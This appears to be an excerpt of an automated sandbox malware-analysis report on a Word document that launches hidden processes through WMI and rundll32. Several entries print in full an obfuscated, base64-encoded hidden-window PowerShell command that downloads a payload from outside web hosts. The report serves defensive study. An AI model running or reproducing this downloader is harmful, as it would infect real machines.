IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQA

PowerShell case anomaly found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK			Jump to behavior

Suspicious powershell command line found

Show sources

Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IABzAFYAIAAgACgAIgBLACIAKwAiADQANwBkACIAKQAgACAAKABbAHQAWQBQAGUAXQAoACIAewA0AH0AewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAtAEYAJwBzACcALAAnAHkAJwAsACcAZQBjAFQAbwByAFkAJwAsACcAVABFAG0ALgBJAG8ALgBEAEkAcgAnACwAJwBzACcAKQApACAAIAA7ACAAIAAgACAAJABXAGkAOAAgAD0AWwB0AHkAUABlAF0AKAAiAHsAMgB9AHsAMwB9AHsANwB9AHsAMQB9AHsANAB9AHsANgB9AHsANQB9AHsAOAB9AHsAMAB9ACIALQBGACAAJwBnAEUAUgAnACwAJwAuAE4AZQB0AC4AUwBFAFIAVgAnACwAJwBTAFkAcwAnACwAJwBUAGUAJwAsACcASQAnACwAJwB0AG0AQQAnACwAJwBDAGUAUABPAEkATgAnACwAJwBtACcALAAnAE4AYQAnACkAIAA7ACAAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAoACgAJwBTAGkAbABlAG4AdAAnACsAJwBsAHkAJwApACsAJwBDACcAKwAoACcAbwBuACcAKwAnAHQAaQAnACkAKwAnAG4AJwArACcAdQBlACcAKQA7ACQATwBsADkAbwBuAGsAaQA9ACQAQwAwADIAVwAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAQQAwADMAUAA7ACQASAAyADcAWAA9ACgAJwBJACcAKwAoACcANgAnACsAJwA3AFEAJwApACkAOwAgACAAKABnAGkAIAAoACIAVgBhAFIAIgArACIAaQBBAEIATABlADoAawAiACsAIgA0ADcAZAAiACkAIAAgACkALgB2AGEATAB1AGUAOgA6ACIAQwByAEUAYABBAGAAVABgAEUARABJAFIAZQBDAFQAYABPAFIAeQAiACgAJABIAE8ATQBFACAAKwAgACgAKAAnAHsAJwArACcAMAAnACsAJwB9AE4AcwAnACsAJwBwACcAKwAnAHoAdgBzAGcAewAnACsAJwAwAH0AJwArACcAUwBqAF8AZAB3AGcAcwB7ACcAKwAnADAAfQAnACkAIAAgAC0AZgAgAFsAQwBIAEEAUgBdADkAMgApACkAOwAkAFQANAA4AEsAPQAoACcASAAnACsAKAAnADYAMQAnACsAJwBEACcAKQApADsAIAAgACQAVwBpADgAOgA6ACIAcwBlAGMAdQBSAGkAdABgAHkAcAByAE8AYABUAGAAbwBjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzACcAKQArACcAMQAyACcAKQA7ACQAQwA1ADkATQA9ACgAKAAnAE0AJwArACcAMgA0ACcAKQArACcAUAAnACkAOwAkAFgAbQBtAGgAawBlAGQAIAA9ACAAKAAoACcAUgAnACsAJwAzADEAJwApACsAJwBOACcAKQA7ACQAQQA2ADkASQA9ACgAKAAnAFAAXwAnACsAJwA2ACcAKQArACcAQgAnACkAOwAkAFEAMgB5AGcAOQBnAF8APQAkAEgATwBNAEUAKwAoACgAKAAnADEAJwArACcAdwByACcAKQArACgAJwBOAHMAJwArACcAcAB6ACcAKQArACgAJwB2ACcAKwAnAHMAZwAnACkAKwAnADEAdwAnACsAKAAnAHIAUwAnACsAJwBqAF8AJwArACcAZAB3ACcAKwAnAGcAcwAxAHcAcgAnACkAKQAuACIAcgBFAHAAYABsAEEAYwBlACIAKAAoAFsAQwBoAGEAcgBdADQAOQArAFsAQwBoAGEAcgBdADEAMQA5ACsAWwBDAGgAYQByAF0AMQAxADQAKQAsACcAXAAnACkAKQArACQAWABtAG0AaABrAGUAZAArACgAKAAnAC4AZAAnACsAJwBsACcAKQArACcAbAAnACkAOwAkAFUAMwA5AFIAPQAoACcATQAwACcAKwAnADEAUAAnACkAOwAkAFEAYwBlAGMAaAA0AGgAPQAoACcAXQBhACcAKwAoACcAbgAnACsAJwB3AFsAMwA6AC8ALwAnACkAKwAoACcAdwAnACsAJwBwAHMAJwApACsAJwBhACcAKwAnAHAAawAnACsAKAAnAC4AYwBvACcAKwAnAG0ALwB3AHAALQAnACsAJwBhAGQAJwArACcAbQBpACcAKQArACgAJwBuAC8AdgAnACsAJwAvAEAAJwApACsAJwBdACcAKwAoACcAYQBuAHcAJwArACcAWwAzACcAKwAnADoALwAvAHMAJwApACsAKAAnAG8AZgBzAHUAJwArACcAaQAnACkAKwAnAHQAZQAnACsAKAAnAC4AYwAnACsAJwBvACcAKQArACcAbQAvACcAKwAnAHcAcAAnACsAKAAnAC0AaQAnACsAJwBuAGMAJwApACsAKAAnAGwAdQBkACcAKwAnAGUAJwApACsAJwBzAC8AJwArACgAJwAyAGoAbQAzAG4AJwArACcASQBrAC8AJwArACcAQAAnACkAKwAoACcAXQBhACcAKwAnAG4AdwBbACcAKQArACcAMwAnACsAKAAnADoALwAvAHYAZQB0AGUAcgAnACsAJwBpAG4AYQByAGkAYQAnACsAJwBkACcAKQArACgAJwByAHAAJwArACcAbwBwACcAKQArACgAJwB1AGkALgBjAG8AJwArACcAbQAnACkAKwAoACcALwAnACsAJwBjAG8AJwApACsAJwBuACcAKwAnAHQAZQAnACsAKAAnAG4AdAAnACsAJwAvADUAZgAnACkAKwAnADEAJwArACcAOABRACcAK			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 7_2_1000C620 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,

7_2_1000C620

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10008085 push ecx; ret		7_2_10008098
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_10004ADA push ecx; ret		7_2_10004AED

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Shuwftk\rwhokf.exo:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vngxkvjbqisigbn\asgkrazesikwug.frl:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Qzqgszcguiavsow\gdavyvbzxdoyhw.ift:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Gfhmd\pcib.aey:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Gwiivizeoc\rneajwbra.jdv:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Vshkfdgna\nswgiepj.iji:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
